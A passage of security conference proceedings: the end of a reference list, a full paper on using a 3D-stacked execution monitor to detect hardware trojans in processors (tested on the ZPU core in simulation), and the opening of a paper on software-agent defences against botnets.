http://www.nursingtimes.net/whats-new-in-nursing/acute-care/loss-of-patient-details-prompts-warning-forfive-trusts/5004422.article<br />

[Accessed: 01 June 2010].<br />

Office of Public Sector Information, (2010). Access to Medical Reports Act 1988 (1988 CHAPTER 28), [online].<br />

Available from: http://www.opsi.gov.uk/acts/acts1988/Ukpga_19880028_en_1.htm [Accessed: 01 June<br />

2010].<br />

Park, J. and Sandhu, R., (2002). Towards usage control models: beyond traditional access control. In: the<br />

seventh ACM symposium on Access control models and technologies, SACMAT '02. Monterey, California,<br />

USA: ACM. pp. 57-64.<br />

286


Shada Alsalamah et al.<br />

Pirnejad, H., (2008). Communication in Healthcare: Opportunities for information technology and concerns for<br />

patient safety. Thesis. Erasmus University. Rotterdam. pp. 164.<br />

Røstad, L. and Alsos, O. A., (2009). Patient-Administered Access Control: A Usability Study. In: International<br />

<strong>Conference</strong> on Availability, Reliability and Security 2009. ARES '09. IEEE Computer Society. pp. 877- 881.<br />

Skilton, A. et al., (2009). Role Based Access in a Unified Electronic Patient Record. In: The 14th International<br />

Symposium on Health Information Management Research. Bath P, Petersson G, AND Steinschaden T<br />

editors. Kalmar, Sweden. pp. 217- 222.<br />

Smith, E. and Eloff, J. H. P., (1999). Security in Health-care information systems - current trends. International<br />

Journal of Medical Informatics, 54, (1) pp. 39-54.<br />

Sturcke, J. and Campbell, D., (2010). NHS database raises privacy fears, say doctors, [online]. Available from:<br />

http://www.guardian.co.uk/society/2010/mar/07/nhs-database-doctors-warning?CMP=twt_gu [Accessed: 12<br />

November 2010].<br />

Thompson, M. R., Essiari, A. and Mudumbai, S., (2003). Certificate-based authorization policy in a PKI<br />

environment. ACM Trans. Inf. Syst. Secur., 6, (4) pp. 566-588.<br />

Wasson, G. and Humphrey, M., (2003). Policy and Enforcement in Virtual Organizations. In: The fourth<br />

International Workshop on Grid Computing, IEEE/ACM IEEE Computer Society. pp.125.<br />

Yau, S. S. and Chen, Z., (2008). Security Policy Integration and Conflict Reconciliation for Collaborations among<br />

Organizations in Ubiquitous Computing Environments. In: Ubiquitous Intelligence and Computing, UIC.<br />

Springer Berlin/ Heidelberg. pp. 3- 19.<br />

Zander, K., (2002). Integrated Care Pathway: eleven international trends. Journal of Integrated Care Pathways,<br />

6, pp. 101-107.<br />

287


3D Execution Monitor (3D-EM): Using 3D Circuits to Detect<br />

Hardware Malicious Inclusions in General Purpose<br />

Processors<br />

Michael Bilzor<br />

U.S. Naval Postgraduate School, Monterey, California, USA<br />

mbilzor@nps.edu<br />

Abstract: Hardware malicious inclusions (MIs), or "hardware trojans," are malicious artifacts planted in<br />

microprocessors. They present an increasing threat to computer systems due to vulnerabilities at several stages<br />

in the processor manufacturing and acquisition chain. Existing testing techniques, such as side-channel analysis<br />

and test-pattern generation, are limited in their ability to detect malicious inclusions. These hardware attacks can<br />

allow an adversary to gain total control over a system, and are therefore of particular concern to high-assurance<br />

customers like the U.S. Department of Defense. In this paper, we describe how three-dimensional (3D) multilayer<br />

processor fabrication techniques can be used to enhance the security of a target processor by providing<br />

secure off-chip services, monitoring the execution of the target processor's instruction set, and disabling<br />

potentially subverted control circuits in the target processor. We propose a novel method by which some<br />

malicious inclusions, including those not detectable by existing means, may be detected and potentially mitigated<br />

in the lab and in fielded, real-time operation. Specifically, a target general-purpose processor, in one layer, is<br />

joined using 3D interconnects to a separate layer, which contains an Execution monitor for detecting deviations<br />

from the target processor's specified behavior. The Execution monitor layer is designed and fabricated separately<br />

from the target processor, using a trusted process, whereas the target processor may be fabricated by an<br />

untrusted source. For high-assurance applications, the monitor layer may be joined to the target layer, after each<br />

has been separately fabricated. In the context of existing computer security theory, we discuss the limits of what<br />

an Execution monitor can do, and describe how one might be constructed for a processor. Specifically, we<br />

propose that the signals which carry out the target processor's instruction set actions may be described in a<br />

stateful representation, which serves as the input for a finite automata-based Execution monitor, whose<br />

acceptance predicate indicates when the target processor's behavior violates its specification. We postulate a<br />

connection between Execution monitor theory and the proposed 3D processor monitoring system, which can be<br />

used to detect a specific class of malicious inclusions. Finally, we present the results of our first monitor<br />

experiment, in which we designed and tested (in simulation) a simple Execution monitor for a small open-source<br />

32-bit processor design known as the ZPU. We analyzed the ZPU processor to determine which signals must be<br />

monitored, designed a system of monitor interconnects in the hardware description language (HDL)<br />

representation, developed a stateful representation of the microarchitectural behavior of the ZPU, and designed<br />

an Execution monitor for it. We demonstrated that the Execution monitor identifies correct operation of the<br />

original, unmodified ZPU, as it executed arbitrary code. Having introduced some minor deviations to the ZPU<br />

processor's microarchitectural design, we then showed in simulation that the Execution monitor correctly<br />

detected the deviations, in the same way that it might detect the presence of some malicious inclusions in a<br />

modern processor.<br />

Keywords: processor, security, trojan, subversion, detection<br />

1. The threat to microprocessors<br />

Today's Defense Department relies on advanced microprocessors for its high-assurance needs.<br />

Those applications include everything from advanced weaponry, fighter jets, ships, and tanks, to<br />

satellites and desktop computers for classified systems. Much attention and resources have been<br />

devoted to securing the software that runs these devices and the networks on which they<br />

communicate. However, two significant trends make it increasingly important that we also focus on<br />

securing the underlying hardware that runs these high-assurance devices. The first is the U.S.'<br />

greater reliance on processors produced overseas. The second is the increasing ease with which<br />

hardware may be maliciously modified and introduced into the supply chain.<br />

Every year, more microprocessors destined for U.S. Department of Defense (DoD) systems are<br />

manufactured overseas, and fewer are made inside the U.S. As a result, there is a greater risk of<br />

processors being manufactured with malicious inclusions (MIs), which could compromise highassurance<br />

systems. This concern was highlighted in a 2005 report by the Defense Science Board,<br />

which noted a continued exodus of high-technology fabrication facilities from the U.S. (Defense<br />

Science Board 2005). Since this report, "more U.S. companies have shifted production overseas,<br />

have sold or licensed high-end capabilities to foreign entities, or have exited the business."<br />

(McCormack 2008) One of the Defense Science Board report's key findings reads, "There is no longer<br />

288


Michael Bilzor<br />

a diverse base of U.S. integrated circuit fabricators capable of meeting trusted and classified chip<br />

needs." (Defense Science Board 2005)<br />

Today, most semiconductor design still occurs in the U.S., but some design centers have recently<br />

developed in Taiwan and China (Yinung 2009). In addition, major U.S. corporations are moving more<br />

of their front-line fabrication operations overseas for economic reasons:<br />

"Press reports indicate that Intel received up to $1 billion in incentives from the Chinese<br />

government to build its new front-end fab in Dalian, which is scheduled to begin production in<br />

2010." (Nystedt 2007)<br />

"Cisco Systems has pronounced that it is a 'Chinese company,' and that virtually all of its products<br />

are produced under contract in factories overseas." (McCormack 2008)<br />

"Raising even greater alarm in the defense electronics community was the announcement by IBM<br />

to transfer its 45-nanometer bulk process integrated circuit technology to Semiconductor<br />

Manufacturing International Corp., which is headquartered in Shanghai, China. There is a concern<br />

within the defense community that it is IBM's first step to becoming a 'fab-less' semiconductor<br />

company." (McCormack 2008)<br />

Since modern processors are designed in software, the processor design plans become a potential<br />

target of attack. Malicious logic can also be inserted after a chip has been manufactured, such as with<br />

focused ion beam milling (Adee 2009).<br />

Though reports of actual malicious inclusions are often classified or kept quiet for other reasons,<br />

some reports do surface, like this unverified account (Adee 2009):<br />

According to a U.S. defense contractor who spoke on condition of anonymity, a<br />

'<strong>European</strong> chip maker' recently built into its microprocessors a "kill switch" that could be<br />

accessed remotely. French defense contractors have used the chips in military<br />

equipment, the contractor told IEEE Spectrum. If in the future the equipment fell into<br />

hostile hands, 'the French wanted a way to disable that circuit,' he said.<br />

According to the New York Times, such a "kill switch" may have been used during the 2007 Israeli<br />

raid on a suspected Syrian nuclear facility under construction (Markoff 2009).<br />

2. Characterizing processor malicious inclusions<br />

Several academic research efforts have demonstrated the insertion of MIs into general-purpose<br />

processor designs. In one example, King, et al., show how a very small change in the design of a<br />

processor facilitates "escalation-of-privilege" and "shadow mode" attacks, each of which can allow an<br />

adversary to gain arbitrary control over the targeted system (King 2009). In another example, Jin, et<br />

al., show how small, hard-to-detect MIs can allow an adversary to gain access to a secret encryption<br />

key (Jin 2009). Researchers have created various taxonomies of MIs, based on their characteristics.<br />

One example comes from Tehranipoor and Koushanfar (Tehranipoor 2010), from which the following<br />

simplified diagram (Figure 1) is derived:<br />

The components of a simple general-purpose processor are generally classifiable according to their<br />

function. For example, a circuit in a microprocessor may participate in control-flow execution<br />

(participate in fetch-decode-execute-retire), be part of a data path (like a bus), execute storage and<br />

retrieval (like a cache controller), assist with control, test and debug (as in a debug circuit), or perform<br />

arithmetic and logic computation (like an arithmetic-logic circuit, or ALU). This list may not be<br />

exhaustive, and some circuits' functions may overlap, but broadly speaking we can subdivide the<br />

component circuits in a processor using these classifications.<br />

The main focus of our research is the detection of malicious inclusions which target the first category,<br />

control flow circuits. In considering processor malicious inclusions, it is worth noting that in some<br />

cases a detection strategy is warranted, and in others a mitigation strategy may be preferable. Table<br />

1 lists each of the circuit functional types mentioned above, and pairs it with a potential 3D detection<br />

and/or mitigation strategy.<br />

289


Michael Bilzor<br />

Figure 1: A taxonomy of malicious inclusions, modified slightly from (Tehranipoor 2010)<br />

Table 1: Processor circuit type, with some associated MI mitigation and detection techniques<br />

Circuit Type Detection/Mitigation Technique<br />

Control Flow Control Flow Execution Monitor<br />

(subject of our experiments)<br />

Chip Control, Test, and Debug Keep-Alive Protections<br />

Data Paths Datapath Integrity Verification<br />

Memory Storage and Retrieval Load/Store Verification<br />

Arithmetic and Logic Computation Arithmetic/Logic Verification<br />

In Figure 2, we update the malicious inclusion taxonomy from Figure 1, and associate each MI action<br />

type with a matching detection or mitigation technique:<br />

Figure 2: Malicious inclusion taxonomy, with associated mitigation and detection methods<br />

290


Michael Bilzor<br />

In our current experiments, we intend to demonstrate an implementation of the execution monitor,<br />

which governs the operation of the instruction set of a general-purpose processor, and should detect<br />

MIs from the fourth action category, "Modify Functionality." MIs from this category might, for example,<br />

be designed to allow an adversary to leak secret information or to gain privileged access in system.<br />

3. Limits of existing processor tests<br />

General-purpose processor designs go through verification testing before fabrication begins. Designphase<br />

verification usually involves construction of a verification environment using tools like<br />

SystemVerilog and the Open Verification Methodology (OVM) (Iman 2008). There are several<br />

shortfalls with verifying processor designs, with respect to malicious inclusions:<br />

Not all processor designs, or portions of designs, undergo formal verification. Processor designs<br />

also may incorporate reused sub-components, as well as unverified open-source or third-party<br />

components.<br />

Processor design verification tends to ensure that the processor correctly executes its intended<br />

functions, but usually is not designed to verify the absence of additional, possibly malicious<br />

functionality, such as an MI.<br />

Processor design verification usually cannot be exhaustive, due to the exponential number of<br />

possible internal configurations of a processor. Modern functional verification often focuses on<br />

generating a sufficient number of random test cases to be reasonably confident of a design's<br />

correctness; as a result, rare-event malicious triggers may not be detected.<br />

Once a processor has been fabricated, some sample dies may be examined, destructively or<br />

nondestructively, for the presence of MIs. Using destructive methods, a processor's top layers may be<br />

removed and its metal layers examined for anomalies, using specialized imagers. Since processors<br />

cannot be used operationally after destructive testing, it is limited to a small sample set, and not a<br />

complete solution.<br />

Non-destructive processor tests include various power and timing "fingerprinting" techniques.<br />

Essentially, using sensitive measuring equipment, a tester can drive a processor's inputs with test<br />

patterns and measure current and timing delays at the outputs. The results from the device under test<br />

are statistically compared with the results from presumed-good, or "golden," sample processors. The<br />

principal limitations of nondestructive fingerprint-based testing include: (Agrawal 2007, Jin 2008, Jin<br />

2009, Rad 2008)<br />

Such tests rely on the existence of a presumed-good "golden" sample. Therefore, if the<br />

subversion occurred in the design phase, and hence was cast into all the fabricated processors,<br />

the subversion will not be detected through these comparisons.<br />

Very small MIs, involving fewer than around .1% of the transistors on a die, are generally not<br />

detectable using these techniques, and it is not very difficult for an attacker to design a subversion<br />

which remains below this threshold.<br />

4. 3D fabrication and potential security applications<br />

Because feature sizes are shrinking very near to their theoretical limits, processor manufacturers are<br />

constrained in improving performance through the use of traditional methods on a single-layer design.<br />

As a result, manufacturers and designers have been rapidly advancing the technologies needed to<br />

make "3D" processors. In a 3D processor design, two or more silicon layers are joined together face<br />

to face or face to back, using a variety of interconnection methods. As a result, off-chip resources, like<br />

extra cache memory or another processor, which might normally be elsewhere on the printed circuit<br />

board, are physically much closer to the primary processing layer, resulting in shorter communication<br />

delays, and hence better performance (Mysore 2006). Though the development of 3D interconnect<br />

technology has been driven by performance, several security-relevant applications have also been<br />

suggested (Valamehr 2010):<br />

3D security services, such as those that might be found in a security coprocessor, could be made<br />

available to the primary processor layer.<br />

A 3D layer acting as a "control plane" could monitor and restrict the behavior of a target processor<br />

in the "computation plane." For example, the control plane processor could facilitate the<br />

segregation of multi-level data by partitioning the cache lines inside the target.<br />

291


Michael Bilzor<br />

Another potential security-relevant application of 3D is the Execution monitor, or 3D-EM. With a 3D-<br />

EM, key control signals of the target processor, or computation plane, are monitored, through 3D<br />

interconnects, by another processor in the control plane. The EM's sole purpose is to monitor the<br />

execution of the target processor, and identify when the sequences of observed signal values deviate<br />

from those sequences allowed by the target processor's design. Design and construction of a 3D-EM<br />

alongside a target processor could occur as follows:<br />

The target processor's architectural design is developed and translated into hardware design<br />

language (HDL).<br />

From the design documents and HDL specification, the processor's design undergoes normal<br />

functional verification (e.g., formal methods, OVM, simulation, FPGA test), to determine:<br />

Correctness of the expected functionality (as normal).<br />

Absence of any malicious additional functionality (additional steps for MI detection).<br />

Once the target's HDL design is finalized, the target's execution control signals (those which must<br />

be monitored) are identified. An HDL version of the monitor is constructed. One of our research<br />

goals is to develop a "recipe" for these two steps.<br />

During floorplanning (including power, area, and heat optimizations) of the target, the appropriate<br />

3D monitoring interconnects are physically laid out, from the target layer to the monitor layer.<br />

The target's final floorplanned design is transferred to a set of fabrication masks and sent to the<br />

foundry for production. The target processors may be fabricated at either a trusted or an untrusted<br />

foundry.<br />

Target processors which are not destined for high-assurance applications are finished and<br />

assembled onto printed circuit boards.<br />

Target processors which are destined for monitored, high-assurance applications are shipped for<br />

further assembly.<br />

The monitors are fabricated at a trusted facility.<br />

The target processors and monitors are then joined, assembled onto printed circuit boards, and<br />

tested again.<br />

Adding the extra steps to co-design a monitor will slow the overall development process; one goal of<br />

our research is to find ways to automate or semi-automate the monitor co-design portion. The target<br />

processors could still be produced in large volume for non-high-assurance customers, where<br />

monitoring is not required, in order to keep their unit cost down. Only the high-assurance customers<br />

need to go through the extra steps of designing, fabricating, and joining the monitor layer. The monitor<br />

layer might be placed above or below the target layer. One possible arrangement is shown in Figure<br />

3:<br />

Figure 3: A possible 3D arrangement of the monitor and target layers, adapted from (Puttaswamy<br />

2006)<br />

292


5. Execution monitor theory<br />

Michael Bilzor<br />

Several of the important characteristics of an EM were described by Schneider (Schneider 2000). A<br />

brief summary of some of the conclusions is listed below (see source for formal definitions of safety<br />

property and security automata).<br />

The target's execution is characterized by (finite or infinite) sequences, where Ψ denotes a<br />

universe of all possible sequences, and a target S defines a subset ΣS of Ψ corresponding to the<br />

executions of S. The sequences may be comprised of atomic actions, events, or system states,<br />

for example.<br />

A security policy is specified by giving a predicate on sets of executions. A target S satisfies<br />

security policy P if an only if P(ΣS) equals true.<br />

If the set of executions for a security policy P is not a safety property, then an enforcement<br />

mechanism from an EM does not exist for P.<br />

EM-enforceable security policies are composable: when multiple EMs are used in tandem, the<br />

policy enforced by the aggregate is the conjunction of the policies enforced by each in isolation.<br />

A security automata can serve as the basis for an enforcement mechanism in EM.<br />

Consider a set of signals A which are dependent on the value of an instruction opcode in a processor.<br />

We assume that, within the set A, all the signals change values synchronously, as they would in a<br />

common clock domain. The possible values of a single member a ∈ A may be described by a set of<br />

finite, discrete values V (e.g., logic low, logic high, high impedance, etc.). These physical values are<br />

represented discretely in an HDL description, as well. For example, a VHDL "standard logic" signal is<br />

nine-valued: V = {U, X, 0, 1, Z, W, L, H, -}. If set A contains n signals, we can denote them a1, a2, ...<br />

an. For a target processor S, containing the signals of A (and others), the state of A at time t may be<br />

denoted At, and the execution trace of the signals in A of processor S may be described as an<br />

ordered set of states ΣS = {A0, A1, ... }. Here, Ψ represents the universe of all possible execution<br />

traces.<br />

We hypothesize that, in terms of instruction set execution:<br />

The signals comprising A may be systematically identified,<br />

The permitted and prohibited sequences of signal states, defining P(ΣS) = True and P(ΣS) = False,<br />

may be inferred from the processor's specification and HDL definition, and<br />

A 3D-EM developed using our construction meets the criteria of a security automata, enforcing a<br />

safety property.<br />

One goal of our research is to demonstrate that a 3D processor Execution monitor can be developed<br />

which satisfies the conditions of (Schneider 2000) and is able to detect a certain class of MI -<br />

specifically, an MI which causes the processor's instruction-control signals, comprising the<br />

microarchitectural state of the machine, to deviate from their allowable control flow.<br />

6. Experimental evaluation<br />

The ZPU is a simple general-purpose, open-source processor, whose VHDL design we obtained from<br />

OpenCores.org (OpenCores 2010). The ZPU uses 32-bit operands and a subset of the MIPS<br />

instruction set. It has a stack-based architecture, without an accumulator, and no internal processor<br />

registers. It is an unpipelined, single-core design, supporting interrupts, but with no privilege rings or<br />

other complex features. It is intended primarily for system-on-chip implementations in FPGAs.<br />

The top level design of the ZPU (Figure 4) contains a processor core, a timer, a CPU-to-memory I/O<br />

unit, and a DRAM (memory) unit:<br />

We created and added a monitor entity for the processor core. The units communicated as below, in<br />

Figure 5:<br />

From the VHDL design of the ZPU core, we manually identified the control-type signals, i.e., the<br />

signals directly carrying out the instruction-set execution. Some examples of these include<br />

memory_read_enable and memory_write_enable, an interrupt signal, an operand_immediate signal,<br />

etc. The ZPU VHDL design explicitly characterizes the internal state of the processor with named<br />

293


Michael Bilzor<br />

states, from which we constructed a full finite state machine (of control signal states) and identified all<br />

the legal state-to-state transitions. Some of the ZPU's internal states and are shown in Figure 6.<br />

Figure 4: Processor and system configuration without execution monitor<br />

Figure 5: Processor and system configuration with execution monitor added<br />

Figure 6: Some of the ZPU processor internal control states<br />

The ZPU monitor accesses the identified control signals through VHDL "ports". In a physical 3D<br />

design, these signals would transit from the target layer to the monitor layer by through-silicon vias<br />

(TSVs) or some other 3D joining method. This mapping might occur at the 3D floorplanning stage,<br />

before the netlist files have been synthesized into mask database files for each layer. Since this ZPU<br />

294


Michael Bilzor<br />

design was run in simulation but not physically synthesized, the physical 3D translation is notional.<br />

However, the circuit delay (one full clock cycle) for interlayer signal transmission and the number of<br />

3D posts - approximately 50, in this case - are reasonable, given the current state of 3D interconnect<br />

design (Mysore 2006).<br />

The monitoring logic actually makes two checks. The first check consults a lookup table that contains<br />

the state transition logic. For example, if the monitor detects that the ZPU went from state A to state<br />

B, and that the signal set was S at the completion of the clock cycle when it was in state A, the<br />

monitor looks to see if a matching legal transition exists in the table. The construction of the table is<br />

such that each transition must be unique; the processor can't choose nondeterministically among<br />

several available choices. If the monitor detects that no legal transition from state A with signal set S<br />

to state B existed, then it sets the output "predicate" to false to flag a violation.<br />

The second check verifies that any changes to the signal set S, in state A, to the new signal set S', in<br />

state B, were legal, according to the transition table. Using the transition that was selected in the<br />

previous step, the monitor evaluates each signal in S' to see if it violated any of the post-conditions of<br />

the transition. If not, it again signals the appropriate predicate to false.<br />

The monitor was evaluated using Mentor Graphics' Model Sim tool. In the first test, the unmodified<br />

ZPU processor executes code with the monitor observing. The ZPU software program used for these<br />

particular tests included a broad mix of all of the ZPU instruction set opcodes. In the first test, the<br />

execution of the unmodified ZPU did not cause the monitor to flag any transitions or signal<br />

modifications as illegal. Next, we made small modifications to the ZPU core, then recompiled the<br />

design and ran the simulation again.<br />

Some of the small deviations we introduced in the ZPU processor design included:<br />

When visiting the internal "No-op" state, the ZPU increments a counter which ticks up to 5 "No-op"<br />

instructions, then on the next one sets the "inInterrupt" signal to 1, causing a violation to be<br />

observed by the monitor.<br />

In another modification, the ZPU tries to go straight from the internal "No-op" state to the "Resync"<br />

state (which is not allowed by the design specification), and again a violation is observed by the<br />

monitor.<br />

The HDL code for these example deviations is below:<br />

when State_Nop =><br />

begin_inst


Michael Bilzor<br />

Figure 7: The processor executed normally, and no anomalies were detected<br />

Figure 8: The first processor anomaly was active, and was detected by the monitor<br />

Figure 9: The second processor anomaly was active, and was detected by the monitor<br />

The monitor's transition table had 112 records in it, to cover the 112 allowable transitions among the<br />

23 unique internal processor states. These are reasonably small numbers to implement in a monitor,<br />

but we are also interested in the growth of the size of the monitor, as the target processor becomes<br />

more complex.<br />

Recall from Section 5 that a standard circuit's voltage, as described in VHDL, can represent one of 9<br />

discrete values. For n circuits, then, we would expect 9 n possible signal permutations - an<br />

impractically large number, if the state machine must have 9 n states, one for each permutation. We<br />

will explore in future research whether the actual number of required signal permutations, and hence<br />

monitor states, is typically much smaller, as was the case in this example.<br />

We synthesized the design, using a Virtex-5 FPGA target, in two different configurations - the<br />

processor architecture alone, and the processor architecture with the monitor. In both cases, the<br />

maximum design speed was 228Mhz, indicating that adding the monitor did not impose a speed<br />

performance limit on the processor.<br />

8. Conclusions<br />

The following are some of the limitations of this research:<br />

The techniques illustrated are focused on only one of the categories of malicious inclusion from<br />

the taxonomy described earlier; detection and mitigation techniques should be developed for the<br />

other types as well, and this is an open research area.<br />

The Execution monitor's performance must not limit the performance of the target processor<br />

which it monitors. For example, the maximum clock speed of the EM should be at least as fast as<br />

the maximum intended clock speed of the target processor. The power, area, and heat<br />

requirements of the monitor should not exceed the practical limits of the overall 3D design. Also,<br />

the clock-cycle latency between MI activation and detection should be small enough to permit<br />

effective correction. We plan to evaluate 3D-EM designs further, using these performance<br />

measures, in the future.<br />

From our preliminary work on the ZPU 3D-EM design, we reached the following conclusions:<br />

Designing and simulating the operation of a basic 3D monitor for a simple processor design is<br />

feasible. However, the physical design space for 3D monitors needs further exploration, and<br />

monitors for more complex processors should be developed.<br />

As expected, simple deviations from the processor's specified instruction-control behavior can be<br />

detected at runtime.<br />

The 3D Execution monitor is the first hardware-based approach with the potential for identifying<br />

processor MIs both during testing and during real-time, fielded operation - an important advantage<br />

296


Michael Bilzor<br />

over testbench methods, since delayed triggers may cause an MI to be inactive during<br />

predeployment testing.<br />

9. Future work<br />

For this demonstration, we selected the control signals and developed the stateful representation<br />

manually. In future experiments, we hope to work on methods whereby the microarchitectural control<br />

signals can be automatically identified, and the monitor constructed automatically or semiautomatically<br />

(or identify any reasons why the process cannot be automated). We would like to design<br />

a monitor for a register-based processor with one or more data buses, in order to compare it with<br />

monitoring a stack-based processor like the ZPU. We would also like to design processor anomalies<br />

which accomplish some more meaningful subversions. Finally, we wish to test whether the monitor<br />

can detect unknown MIs, designed by third parties unfamiliar with the monitor construction.<br />

It would be useful to scale up the 3D Execution monitor experiments to more complex processor<br />

designs, with modern features like pipelined and speculative execution, multithreading, vector<br />

operations, virtualization support, and multi-core.<br />

Acknowledgements<br />

This research was funded in part by National Science Foundation Grant CNS-0910734.<br />

References<br />

Adee, S., (2008) "The Hunt for the Kill Switch", [online] IEEE Spectrum, May 2008,<br />

http://spectrum.ieee.org/semiconductors/design/the-hunt-for-the-kill-switch<br />

Agrawal, D., Baktir, S., Karakoyunlu, D., Rohatgi, P., and Sunar, B. (2007) "Trojan Detection Using IC<br />

Fingerprinting", 2007 IEEE Symposium on Security and Privacy.<br />

Defense Science Board (2005). Report of the 2005 Defense Science Board Task Force on High Performance<br />

Microchip Supply, Office of the Undersecretary of Defense for Acquisition, Technology, and Logistics.<br />

Iman, S. (2008) Step-by-Step Functional Verification with SystemVerilog and OVM, Hansen Brown Publishing,<br />

San Francisco.<br />

Jin, Y. and Makris, Y. (2008) "Hardware Trojan Detection Using Path Delay Fingerprint", Proceedings of the 2008<br />

IEEE International Workshop on Hardware-Oriented Security and Trust.<br />

Jin, Y., Kupp, N., and Makris, Y. (2009) "Experiences in Hardware Trojan Design and Implementation",<br />

Proceedings of the IEEE International Workshop on Hardware-Oriented Security and Trust.<br />

King, S., Tucek, J., Cozzie, A., Grier, C. Jiang, W., and Zhou, Y. (2009) "Designing and Implementing Malicious<br />

Hardware", Proceedings of the IEEE International Workshop on Hardware Oriented Security and Trust.<br />

Markoff, J. (2009) "Old Trick Threatens Newest Weapons", [online], New York Times, 27 October.<br />

http://www.nytimes.com/2009/10/27/science/27trojan.html?_r=2.<br />

McCormack, Richard (2008) "DoD Broadens 'Trusted' Foundry Program to Include Microelectronics Supply<br />

Chain", Manufacturing & Technology News, Thursday, 28 February.<br />

Mysore, S., Agrawal, B., Srivastava, N., Lin, S., Banerjee, K., and Sherwood, T. (2006) "Introspective 3D Chips",<br />

2006 International <strong>Conference</strong> on Architectural Support for Programming Languages and Operating<br />

Systems.<br />

Nystedt, D. (2007) "Intel Got its New China Fab for a Bargain, Analyst Says", [online] CIO.com,<br />

http://www.cio.com/article/101450/Intel_Got_Its_New_China_Fab_for_a_Bargain_Analyst_Says<br />

OpenCores.org (2010), [online] http://opencores.org.<br />

Pellerin, D., and Taylor, D. (1997) VHDL Made Easy, Prentice Hall, Upper Saddle River, NJ.<br />

Puttaswany, K., and Loh, G., (2006) "Implementing Register Files for High-Performance Microprocessors in a<br />

Die-Stacked (3D) Technology", Proceedings of the 2006 Emerging VLSI Technologies and Architectures,<br />

Vol. 00, March.<br />

Rad, R., Plusquellic, J., and Tehranipoor, M. (2008) "Sensitivity Analysis to Hardware Trojans Using Power<br />

Supply Transient Signals", 2008 IEEE International Workshop on Hardware Oriented Security and Trust.<br />

Schneider, F. (2000) "Enforceable Security Policies", ACM Transactions on Information and System Security,<br />

Vol. 3, No. 1, February, pp 30-50.<br />

Tehranipoor, M. and Koushanfar, F. (2010) "A Survey of Hardware Trojan Taxonomy and Detection", IEEE<br />

Design and Test of Computers, vol. 27, issue 1, January/February, pp10-24.<br />

Valamehr, J., Tiwari, M., Sherwood, T., Kastner, R., Huffmire, T., Irvine, C., and Levin, T., (2010) Hardware<br />

Assistance for Trustworthy Systems through 3-D Integration, Proceedings of the 2010 Annual Computer<br />

Security Applications <strong>Conference</strong> (ACSAC), Austin, TX, December.<br />

Yinung, F. (2009) "Challenges to Foreign Investment in High-Tech Semiconductor Production in China", United<br />

States International Trade Commission, Journal of International Commerce and Economics, May.<br />

297


Towards an Intelligent Software Agent System as Defense<br />

Against Botnets<br />

Evan Dembskey and Elmarie Biermann<br />

UNISA, Pretoria, South Africa<br />

French South African Institute of Technology CPUT, Cape Town, South Africa<br />

Dembsej@unisa.ac.za<br />

bierman@xsinet.co.za<br />

Abstract: Computer networks are targeted by state and non-state actors and criminals. With the<br />

professionalization and commoditization of malware we are moving into a new realm where off-the-shelf and<br />

time-sharing malware can be bought or rented by the technically unsophisticated. The commoditization of<br />

malware comes with all the benefits of mass produced software, including regular software updates, access to<br />

fresh exploits and the use of hack farms. To an extent defense is out of the hands of the government, and in the<br />

hands of commercial and private hands. However, the cumulative effect of Information Warfare attacks goes<br />

beyond the commercial and private spheres and affects the entire state. Thus the responsibility for defense<br />

should be distributed amongst all actors within a state. As malware increases and becomes more sophisticated<br />

and innovative in their attack vectors, command & control structures and operation, more sophisticated,<br />

innovative and collaborative methods are required to combat them. The current scenario of partial protection due<br />

to resource constraints is inadequate. It is thus necessary to create defence systems that are robust and resilient<br />

against known vectors and vectors that have not previously been used in a manner that is easy and cheap to<br />

implement across government, commercial and private networks without compromising security. We argue that a<br />

significant portion of daily network defence must be allocated to software agents acting in a beneficent botnet<br />

with distributed input from human actors, and propose a framework for this purpose. This paper is based the<br />

preliminary work of a PhD thesis on the topic of using software agents to combat botnets, and covers the<br />

preliminary literature survey and design of the solution. This includes a crowd sourcing component that uses<br />

information about malware gained from software agents and from human users. Part of this work is based on<br />

previous research by the authors. It is anticipated that the research will result in a clearer understanding of the<br />

role of software agents in the role of defence against computer network operations, and a proof-of-concept<br />

implementation.<br />

Keywords: information warfare, Botnet, software agent<br />

1. Introduction<br />

We propose to use distributed software agents (SA) as a method for overcoming botnets and other<br />

malware in the area of Information Warfare (IW). This area of research is important due to the growing<br />

threat posed by malware. This research addresses some of the long term research goals identified by<br />

the US National Research Council (National Research Council (U.S.). Committee on the Role of<br />

Information Technology in Responding to Terrorism et al. 2003) and four of the ten suggested<br />

research areas in (Denning, Denning 2010). It is an extension and refinement of research undertaken<br />

to determine if an IW SA agent framework is viable (Dembskey, Biermann 2008).<br />

Malware is a reality of networked computers and is being increasingly used by state, criminal and<br />

terrorist actors as weapons, vectors for crime and tools of coercion. While it is debatable whether a<br />

digital Pearl Harbour is a genuine possibility (Smith 1998), it is agreed that malware is on the increase<br />

and is being commoditized (Knapp, Boulton 2008, Microsoft 2010, Dunham, Melnick 2009), though<br />

there is some dissent on this point (Prince 2010). Technically unsophisticated users can purchase<br />

time on existing botnets to accomplish some goal, e.g. phishing attacks, spamming, or the denial,<br />

destruction or modification of data.<br />

A botnet is a distributed group of software agent-like bots that run autonomously and automatically,<br />

usually without the knowledge of the computers owner. Botnets are usually, but not necessarily,<br />

malicious. The purpose of botnets is not necessarily destructive; it is often financial gain, which results<br />

in a very different approach to development and Command & Control. An effective process of<br />

prevention, detection and removal will mitigate botnets regardless of their purpose.<br />

IW is warfare that explicitly recognises information as an asset. Computer Network Operations (CNO)<br />

is a form of IW that uses global computer networks to further the aims of warfare. CNO is divided into<br />

Computer Network Attack (CNA) and Computer Network Defence (CND). Increasingly, politically<br />

motivated cyber attacks are focusing on commercial and not government infrastructure (Knapp,<br />

298


Evan Dembskey and Elmarie Biermann<br />

Boulton 2008). Also, money from online scams may be used to fund terrorist and further criminal<br />

activity. SA are a form of software that have the properties of intelligence, autonomy and mobility. We<br />

define SA as programs that autonomously and intelligently acquire, manipulate, distribute and<br />

maintain information on behalf of a user or another software agent.<br />

Intrusion prevention is the Holy Grail of security. This goal is currently unobtainable; there will be<br />

intrusions. The literature shows that traditional defences such as firewalls, antivirus and intrusion<br />

prevention are not effective against botnets (Ollmann 2010). Some researchers believe that antimalware<br />

software is less effective than in the past (Oram, Viega 2009). Researchers at Microsoft<br />

(Microsoft 2010) assert that malware activity increased 8.9% from first to second half of 2009. This is<br />

probably an overly conservative figure. Some researchers estimate that botnet infections are up to<br />

4000% higher than reported (Dunham, Melnick 2009). One major problem in prevention is that social<br />

